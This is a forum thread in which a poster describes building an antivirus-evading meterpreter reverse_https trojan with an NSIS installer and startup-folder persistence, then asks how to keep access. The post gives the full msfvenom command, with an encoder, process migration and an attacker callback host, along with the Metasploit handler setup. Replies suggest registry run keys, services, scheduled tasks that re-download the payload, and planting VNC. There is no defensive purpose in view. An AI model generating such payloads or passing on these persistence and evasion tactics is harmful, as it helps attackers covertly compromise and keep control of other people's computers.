Oxidizer Posted January 9, 2016 Share Posted January 9, 2016 So I've created an .exe using reverse_https meterpreter shell code and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign in. However, meterpreter does not start a when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session, and then listen, it will pick up a new session. How do I maintain access by using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then have metasploit tell it to do something. Here is the shell code that I'm using: msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrepenMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c This is what I type when I start metasploit on Kali: use exploit/multi/handler set payload windows/meterpreter/reverse_https set SessionCommunicationTimeout 0 exploit Quote Link to comment Share on other sites More sharing options...
i8igmac Posted January 9, 2016 Share Posted January 9, 2016 I'm not so sure nsis is necessary... you can use the meterprwter to upload files or write files to the destination folder... place a meterpreterin the startup folder... You can use rc scripts with the exploit handler to automate meterpreter commands. When a shell is first established this rc script would execute... from the meterpreter shell have you tried to modify the registry? Attempt to make a startup service... will this setoff the AV? you have to keep trying new things, and take note of whAt Works... Quote Link to comment Share on other sites More sharing options...
vailixi Posted January 10, 2016 Share Posted January 10, 2016 Sheduled tasks, environmental variables, aliases. You can always write a scheduled task to check if your payload is running if not, start it, stop it, delete it, download and install a new version of the payload. Maybe install a legitimate remote access tool on the machine. VNC or whatever. Quote Link to comment Share on other sites More sharing options...
M1k3 Posted January 27, 2016 Share Posted January 27, 2016 Totally agree with i8igma. Change the registry if you want to maintain persistence. I also don't think that venom is the best solution because it is fully detetable. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.